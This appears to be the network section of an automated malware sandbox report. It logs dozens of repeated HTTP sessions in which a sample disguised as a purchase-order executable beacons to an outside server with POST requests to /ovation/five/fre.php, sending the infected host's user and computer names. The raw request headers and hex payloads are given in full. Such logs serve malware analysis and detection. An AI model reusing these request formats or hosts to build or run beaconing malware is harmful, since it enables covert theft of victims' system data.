                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:52.352931023 CET | 6012 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:52.543189049 CET | 6012 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:52 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            27 | 192.168.2.5 | 49767 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:53.017834902 CET | 6013 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:53.179913998 CET | 6014 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:53.370479107 CET | 6014 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            28 | 192.168.2.5 | 49768 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:53.820832968 CET | 6015 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:53.983036995 CET | 6015 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:54.207701921 CET | 6016 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            29 | 192.168.2.5 | 49769 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:54.628473043 CET | 6020 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:54.790364027 CET | 6021 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:54.987622023 CET | 6024 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:54 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            3 | 192.168.2.5 | 49735 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:29.621978045 CET | 5365 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:29.784650087 CET | 5365 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:29.983164072 CET | 5365 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:29 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 30
                            Source IP: 192.168.2.5
                            Source Port: 49770
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:55.479697943 CET | 6029 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:55.641505003 CET | 6031 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:55.832416058 CET | 6034 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:55 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 31
                            Source IP: 192.168.2.5
                            Source Port: 49771
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:56.264238119 CET | 6035 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:56.427298069 CET | 6035 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:56.637950897 CET | 6035 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:56 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 32
                            Source IP: 192.168.2.5
                            Source Port: 49772
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:57.090883970 CET | 6036 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:57.260030031 CET | 6037 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:57.455832958 CET | 6037 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:57 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 33
                            Source IP: 192.168.2.5
                            Source Port: 49773
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:57.912353039 CET | 6038 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:58.074640036 CET | 6038 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:58.269815922 CET | 6038 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 34
                            Source IP: 192.168.2.5
                            Source Port: 49774
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:58.700265884 CET | 6039 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:58.862180948 CET | 6039 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:59.063069105 CET | 6040 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 35
                            Source IP: 192.168.2.5
                            Source Port: 49775
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:59.551681042 CET | 6041 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:59.713944912 CET | 6041 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:59.925751925 CET | 6041 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:59 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 36
                            Source IP: 192.168.2.5
                            Source Port: 49776
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:50:00.379571915 CET | 6042 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:00.543251038 CET | 6042 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:00.736491919 CET | 6043 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:00 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 37
                            Source IP: 192.168.2.5
                            Source Port: 49777
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:50:01.225791931 CET | 6044 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:01.389466047 CET | 6044 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:01.773279905 CET | 6044 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:01 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 38
                            Source IP: 192.168.2.5
                            Source Port: 49778
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:50:02.942234039 CET | 6045 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:03.104578972 CET | 6046 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:03.318948984 CET | 6046 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:03 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 39
                            Source IP: 192.168.2.5
                            Source Port: 49779
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:50:04.328154087 CET | 6047 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:04.497581959 CET | 6047 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:04.715640068 CET | 6047 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:04 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 4
                            Source IP: 192.168.2.5
                            Source Port: 49736
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:31.069634914 CET | 5366 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:31.232763052 CET | 5366 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:31.424293995 CET | 5367 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:31 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 40
                            Source IP: 192.168.2.5
                            Source Port: 49780
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:50:05.623106956 CET | 6048 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:05.786597013 CET | 6048 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:05.984535933 CET | 6049 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:05 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 5
                            Source IP: 192.168.2.5
                            Source Port: 49737
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:31.953352928 CET | 5367 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:32.114974976 CET | 5368 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:32.325089931 CET | 5368 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 6
                            Source IP: 192.168.2.5
                            Source Port: 49738
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:32.896542072 CET | 5369 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:33.059552908 CET | 5369 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:33.251894951 CET | 5369 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 7
                            Source IP: 192.168.2.5
                            Source Port: 49739
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:33.755837917 CET | 5370 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:33.918710947 CET | 5371 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
